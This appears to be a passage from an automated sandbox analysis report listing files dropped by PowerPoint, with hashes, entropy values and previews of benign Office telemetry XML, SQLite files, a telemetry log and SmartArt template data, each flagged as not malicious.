                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90119" V="1" DC="SM" EN="Office.Telemetry.InvalidDataContractName" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="brt7k" />.. </S>.. <C T="W" I="0" O="true" N="EventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="W" I="1" O="false" N="DataContractName">.. <S T="1" F="DataContractName" />.. </C>.. <C T="B" I="2" O="true" N="IsRuleEvent">.. <S T="1" F="IsRuleEvent" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):621
                                                                                                                              Entropy (8bit):5.131103601127074
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdK1kYJnmjSawSCSvAQUerbK7smEtadoEnFE9EnmMnt9NI7NO2su:2d6pMlw4rceQomS9mu
                                                                                                                              MD5:2C960A01352809BB453D4FFEA7F3A24F
                                                                                                                              SHA1:797FB120E06777A834417B891D12DF2426109266
                                                                                                                              SHA-256:0001E299C1537E4310ABEC01E44FFA398D7A8EEF2D087F68A18EF1DEC43EE19F
                                                                                                                              SHA-512:DCDCBFC6C908456BD189C38B40FCFBDAAE537272FFC991AF3182337E40E05435349D59C93B5D4A81EF072A6B27B6A4FFAA592E7D38D2536B7BE7FA6EDD6F58E8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90120" V="1" DC="SM" EN="Office.Telemetry.InvalidEventContractName" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" DL="A" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="brt7l" />.. </S>.. <C T="W" I="0" O="true" N="EventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="W" I="1" O="false" N="EventContractName">.. <S T="1" F="EventContractName" />.. </C>.. <C T="B" I="2" O="true" N="IsRuleEvent">.. <S T="1" F="IsRuleEvent" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):614
                                                                                                                              Entropy (8bit):5.031646670731258
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBK9SP4SawSCENXWnerJENerCUxlVqK7PNWXf/0//ChmMNOSjsu:2dA9SQlw+JrmYrCUxPLPQp
                                                                                                                              MD5:75330F00B384B4F740260B35CB5C498A
                                                                                                                              SHA1:91693E52C808F245B4BDC7857E7568239F5C3594
                                                                                                                              SHA-256:157DA506F55CFD9B87AE8A740ECAA11E43CAE6CA2093DC465A09BD4DE71C2E2E
                                                                                                                              SHA-512:3042AF7252D2A5BECB6A2A7E73F5A18772A5AE887440905535EEFEE11A377C13CC8EF9D01E61EF43E2E49C20BC8FDCA76E362031D2E5EB8ACC00747A919E70B2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90200" V="4" DC="SM" EN="Office.Telemetry.RulesEngineThrottled" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" T="Upload-Critical" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhyua" A="a6iyn" />.. <UTS T="2" Id="bhyt2" A="bac31" />.. </S>.. <C T="FT" I="0" O="false" N="ThrottlingTimestamp">.. <O T="COALESCE">.. <L>.. <S T="1" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="2" F="TimeStamp100ns" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1131
                                                                                                                              Entropy (8bit):5.119788069276698
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjSyC4SawSCSvAQENXWneralVqK6Vu+SrYOZe/7yHagaIZiN1Dp+hqTHEYoxJ:2djSulwTJraPIBGeDCaaI10j1b
                                                                                                                              MD5:82B5617CB37E4C60FA416E9F3EDB5901
                                                                                                                              SHA1:A88F62CA2AA97B900132F7ABE8E3777BF3E967F1
                                                                                                                              SHA-256:9EE913D9BECC4260D53F6D216F376BB6DDFC459E17A8EB3BEC32E92D5C4121BF
                                                                                                                              SHA-512:05D18A2D446BB713D9801E6586BB0CCFCE40D947035C0F9BDA798469FEDEBC1C6E310429A2E45796E34821C6108153CBB6FDCB6361B97738C06D38C8EEB769D5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90201" V="2" DC="SM" EN="Office.Telemetry.RulesEngineSpikeThrottled" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" T="Upload-Critical" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhyud" A="azxaq" />.. </S>.. <C T="FT" I="0" O="false" N="ThrottlingTimestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="HighestImpactingRuleId">.. <S T="1" F="RuleId" />.. </C>.. <C T="U16" I="2" O="false" N="HighestImpactingRuleVersion">.. <S T="1" F="RuleVersion" />.. </C>.. <C T="U32" I="3" O="false" N="HighestImpactingRuleBytes">.. <S T="1" F="ImpactingBytes" />.. </C>.. <C T="U32" I="4" O="false" N="CurrentLimit">.. <S T="1" F="SpikeCurrentLimit" />.. </C>.. <C T="U32" I="5" O="false" N="MaxLimit">.. <S T="1" F="SpikeMaxLimit" />.. </C>.. <C T="U32" I="6" O="false" N="Factor">.. <S T="1" F="SpikeFactor" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):851
                                                                                                                              Entropy (8bit):5.13362900928204
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdNjStk4SawSCSvAQENXWnerTPlVqK63XMpy/Py8/Ny4DFZNO2su:2dNjSDlwTJrbP6dr5
                                                                                                                              MD5:A739D4DE49237DBAC4D3C707E80E8B96
                                                                                                                              SHA1:08E9077E7A8E7A3F60600EEC861D944287338DDB
                                                                                                                              SHA-256:F7802065990652094646F86074118DF52AC92AFE0AA4AE9F4C9B51407817E112
                                                                                                                              SHA-512:BA11F5B70C32B06F14A76D6157979668165A5A4113D52DEF6A3C8A50D993C6BAAFC6C5EF0E12C4087BBC34042AE2B6CDE519BCC058852942DF7EBD628AEADB3E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90204" V="1" DC="SM" EN="Office.Telemetry.RulesEngineDiskThrottled" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" T="Upload-Critical" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdc2l" A="a4biy" />.. </S>.. <C T="FT" I="0" O="false" N="ThrottlingTimestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U64" I="1" O="false" N="PayloadSize">.. <S T="1" F="PayloadSize" />.. </C>.. <C T="U64" I="2" O="false" N="SessionDiskWriteTotal">.. <S T="1" F="SessionDiskWriteTotal" />.. </C>.. <C T="U64" I="3" O="false" N="DiskWriteTotal">.. <S T="1" F="DiskWriteTotal" />.. </C>.. <C T="U64" I="4" O="false" N="DiskWriteLimit">.. <S T="1" F="DiskWriteLimit" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):760
                                                                                                                              Entropy (8bit):4.67263028306523
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQ5Suu74SawSCENXWnerJENerCUO+tNqNOUX/c//ZpONd+kXqNOzX/c//ZpOi:2d+SuuElw+JrmYrCUNt49CTqC
                                                                                                                              MD5:29B9F2DBA856F305C9A9C50683CC87A0
                                                                                                                              SHA1:D8B61550E9734A7A6C476DD75528D342EFCCA93F
                                                                                                                              SHA-256:5E9A5A5009CF8D5F4F7861F00B4A6B8974F4F9B92D68045C36C9E1C244435B65
                                                                                                                              SHA-512:07FD2EC529B68CA7193FE05FDCA83BEAFDB325759346A7F30BF1BF372F9046526E0705ED008140503B22B2B24CE23AFE826058D07D923537FEB38E9C5924E86F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90206" V="2" DC="SM" EN="Office.Telemetry.RulesEngineMediumCostThrottled" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" T="Upload-Critical" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhyua" A="a6iyn" />.. <UTS T="2" Id="bhyt2" A="bac31" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="NetworkCost" />.. </L>.. <R>.. <V V="1" T="U8" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="NetworkCost" />.. </L>.. <R>.. <V V="1" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):673
                                                                                                                              Entropy (8bit):5.071752018187274
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWRBlbSawSC2RWnerlXFJjEQicitGzNUINO5AdHNUlu:2dozblwwzrJvLYR87
                                                                                                                              MD5:95C1115BEC4D9DEB62C114707373435E
                                                                                                                              SHA1:3FEC93A24BF9D3A4D0EE6035E57337C92B452FE2
                                                                                                                              SHA-256:D7D89C0A1594E4CB047340691648D53016A83A17E52DBC1C2A053B86AC2823F3
                                                                                                                              SHA-512:F44142723089D902016565736BA15358CFF18BE3FD33BED59CE2FC7822213FB346ED2CD394BB9F2A4C4BFA0C5BFBE5DF66BEB3F5985985FE962060C02167EC2D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90207" V="1" DC="SM" EN="Office.Telemetry.SystemHealthMetadataNetworkCost" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" T="Upload-Medium" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a426l" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. <TI T="4" I="Hourly" />.. </S>.. <C T="U8" I="0" O="false" N="NetworkCost">.. <S T="1" F="NetworkCost" />.. </C>.. <C T="TAG" I="1" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):604
                                                                                                                              Entropy (8bit):5.179855489867653
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZ0Bl0iSQSawSC2RWnerc3ntoBs/mUINO2su:2dyz0Clwwzr8QSg
                                                                                                                              MD5:5F549CF5E15807BBEAD072D8A8B5CC17
                                                                                                                              SHA1:B420B54B33FA37A0EDC7EE6C31D84C2B856BE190
                                                                                                                              SHA-256:6DEB2D4AD918DA376C0CF7476B3E70FE23F6517AF08252E8DAD4D8CE89386EE0
                                                                                                                              SHA-512:288C55CE7F9FEB2760B9F191C9D65956723207E0D20D33EA1898AA30CB90CE753382F35BD3158D1336D8F23E2E8695AD887123FAEF97B7FE8A473AD1D7A899B4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90208" V="0" DC="SM" EN="Office.Telemetry.SystemHealthMetadataNetworkCostChange" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" T="Upload-Medium" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a426m" />.. </S>.. <C T="U8" I="0" O="false" N="NewNetworkCost">.. <S T="1" F="NewNetworkCost" />.. </C>.. <C T="U8" I="1" O="false" N="OldNetworkCost">.. <S T="1" F="OldNetworkCost" />.. </C>.. <C T="TAG" I="2" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1877
                                                                                                                              Entropy (8bit):4.975115444313837
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dVpqslwK3bTw2ritdFPZfPiIfzf9a/992iIylJw9hlPZ+:cVpqJK3bU22tTPV9aV92iulPA
                                                                                                                              MD5:2CB1C9F1FD72BA022D6F43711D948110
                                                                                                                              SHA1:FA7DDAB8A22298E24AF05042B29BA0BD81DEC01D
                                                                                                                              SHA-256:6E63C111270BEE2D36BE2B09AB627D4EAD9BCC5957217602075D7CD2DEBD4FEA
                                                                                                                              SHA-512:2DA24657DD4BB1CF80BAB6A1DCC6FD44B26971828C501F64D75AE780409C987615CAE10132D2CA5E6C2BA3D486E6C1C75B4972EF3DB953605FEB4FB1B6E142C2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90303" V="1" DC="SM" EN="Office.Telemetry.TelemetryUlsQueueUsage" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <Etw T="1" E="192" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" />.. <UTS T="2" Id="avuo1" />.. <F T="3">.. <O T="GE">.. <L>.. <S T="1" F="QueueSizeInBytes" />.. </L>.. <R>.. <S T="1" F="ExtraProcessingLimit" />.. </R>.. </O>.. </F>.. <TR T="4" />.. </S>.. <C T="FT" I="0" O="false" N="ResultTime">.. <S T="4" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="falseNoError" N="PeakQueueCB">.. <A T="MAX">.. <S T="1" F="QueueSizeInBytes" />.. </A>.. </C>.. <C T="U16" I="2" O="falseNoError" N="PeakEventCount">.. <A T="MAX">.. <S T="1" F="EventCount" />.. </A>.. </C>.. <C T="U32" I="3" O="falseNoError" N="AverageQueueCB">.. <A T="A
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1249
                                                                                                                              Entropy (8bit):4.85725913320415
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dokNYwlwZlYrlHlqgVwPwlNBHVCPw9uP2f7eVie7:cBYdTYZF7+7
                                                                                                                              MD5:01BDEC61AF8A91F0974FA2877635C522
                                                                                                                              SHA1:65BCD305418E0F394BF8A480CB312C2DD2006B2E
                                                                                                                              SHA-256:CB9AFFBB94DE8A990E1C1FE1F108947D0BE197C7D95483C774A758DBC594C677
                                                                                                                              SHA-512:98FCAA668198A45B741C849137D0AF8C8DA2EB0409D9A47B86520CF7F14B7CEB78D9BA88B7F26F0D873CC036925FB52720A91582FD04889D5790CBD0D5E9B635
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <UTS T="1" Id="c57bd" />.. <R T="2" R="120100" />.. <SS T="3" G="{805a23b4-c402-413c-bc13-1861553d4b03}" />.. </S>.. <C T="W" I="0" O="false" N="SamplingMethod">.. <O T="COALESCE">.. <L>.. <S T="3" F="SamplingMethod" M="Ignore" />.. </L>.. <R>.. <V V="Unknown" T="W" />.. </R>.. </O>.. </C>.. <C T="W" I="1" O="false" N="SamplingKey">.. <O T="COALESCE">.. <L>.. <S T="3" F="SamplingKey" M="Ignore" />.. </L>.. <R>.. <V V="Unknown" T="W" />.. </R>.. </O>.. </C>.. <C T="B" I="2" O="false" N="MeasuresEnabled">.. <O T="COALESCE">.. <L>.. <S T="3" F="MeasuresEnabled" M="Ignore" />.. </L>.. <R>.. <V V="tr
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4096
                                                                                                                              Entropy (8bit):0.09216609452072291
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                                                                                              MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                                                                              SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                                                                              SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                                                                              SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4616
                                                                                                                              Entropy (8bit):0.13760166725504608
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:7FEG2l+/0LslH/FllkpMRgSWbNFl/sl+ltlslVlllfllYn:7+/lXEBg9bNFlEs1EP/In
                                                                                                                              MD5:F7BD6B4478D4B0564ADC9A6A9CEE4C0F
                                                                                                                              SHA1:27890A197ADDB0DA44CBA770A57381928A8E4E78
                                                                                                                              SHA-256:B417CBC092EAFA98F425FAABC87032FDD4731BEA743E453C60CFC35CE1572A33
                                                                                                                              SHA-512:5559F79D9740FE16F5F89BDEA4540361D1D2E9F6A2A0EE3FA01303909FB841252B953FCAA074103DD6AD2F60ECD95BC9D72F6DF6D31FED23C53131AEE5B47F5F
                                                                                                                              Malicious:false
                                                                                                                              Preview:.... .c.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):0.04482848510499482
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:G4l2lBXNg/N64l2lBXNg/NJ8lL9//Xlvlll1lllwlvlllglbXdbllAlldl+l:G4l2bXNE64l2bXNEGL9XXPH4l942U
                                                                                                                              MD5:E344035B0EF3389CF39DC3F2C752BBE2
                                                                                                                              SHA1:A2E28DB6CD09783F2A781C349D21A43079A6A927
                                                                                                                              SHA-256:B9694154ECFFA31F8317AEA1BD53D20F14D8233D4A9683F876975ECBB8C702CA
                                                                                                                              SHA-512:F0B9DFBB8FD15DBD483D3D3B83098F8491B016585CC84801630DE868F75D4580ACBB1C4F68CC87ED3264E7112001D6E5AB44341B54AE52E68774655A22D3904E
                                                                                                                              Malicious:false
                                                                                                                              Preview:..-.....................W...EZ[. .`....(=J.......-.....................W...EZ[. .`....(=J.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):45352
                                                                                                                              Entropy (8bit):0.39398902079791137
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:/BdfQ1ii6ZUw5Ull7DYMi+lkzO8VFDYMi:kz872ll4a8jVG
                                                                                                                              MD5:CF4A33A21A0336C121511281D198D5B0
                                                                                                                              SHA1:C876D2157D02AED4BA07E5D69CBBC67B37075210
                                                                                                                              SHA-256:3F79D3FB97E2D44C3F605130C3EEE98E3A3C715FDE5E1E0BF1CAFAF8F840CC19
                                                                                                                              SHA-512:4B06A50A1B4F2E1D22569993688779E4AA7B6BC22E10A0C665B29E4055D449ACD6653F52068CF665ACE21A138E901FBF8447C19FB3F17AC0036E9DF2F0599CF3
                                                                                                                              Malicious:false
                                                                                                                              Preview:7....-........... .`....4.#............. .`.......n|=.3SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20971520
                                                                                                                              Entropy (8bit):0.04190733968777602
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:klXeZdU89onLHAxYBrHWEercizbdWwcjYWhmxtIJm1BHfjg0bYhvR9pBSHJ8Q3Xw:hE2qJV0+Mh92X3R5
                                                                                                                              MD5:1DE584FDFED4ACEB5FF8721811338D9A
                                                                                                                              SHA1:E8EDD84EB4483382541279C9BF2C00838E0BEC43
                                                                                                                              SHA-256:5784894AFCBCA0D25C2DCD62A84DCC0394B01A29F98331CE0BA0C9D0AB00CEF4
                                                                                                                              SHA-512:2549FF6698AE05741EA74C9A8F8412B07F6F5E00FEA2966B58A47684DDE0293AA9086AD06BFCD959C5440E71277893797768B565156195825CE60C3E04C89D97
                                                                                                                              Malicious:false
                                                                                                                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/04/2024 13:10:36.393.POWERPNT (0x18EC).0x18F0.Microsoft PowerPoint.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Canvas.GraphImport.EntryPointAppear","Flags":30962256044949761,"InternalSequenceNumber":31,"Time":"2024-10-04T13:10:36.393Z","Contract":"Office.System.Activity","Activity.CV":"jFQQ6XkZM0if7nj5e+6b9g.1.17.1.6","Activity.Duration":549,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Activity.Result.Code":-6,"Activity.Result.Type":"EntryPointResult","Data.DetachedDuration":521,"Data.GoLocalRequestSent":false}...10/04/2024 13:10:37.662.POWERPNT (0x18EC).0x18F0.Microsoft PowerPoint.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.RegisterCloudFontCallback","Flags":30962256044949761,"InternalSequenceNumber":47,"Time":"2024-10-04T13:10:37.662Z","Contract":"Office.System.Activity","Activity.CV":"jFQQ6XkZM0if7nj5e+6b9g.1.17.1.16","Activity.Duration":16,
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20971520
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3::
                                                                                                                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                              Malicious:false
                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):246
                                                                                                                              Entropy (8bit):3.5039994158393686
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                              MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                              SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                              SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                              SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3683
                                                                                                                              Entropy (8bit):7.772039166640107
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):254
                                                                                                                              Entropy (8bit):3.4721586910685547
                                                                                                                              Encrypted:false
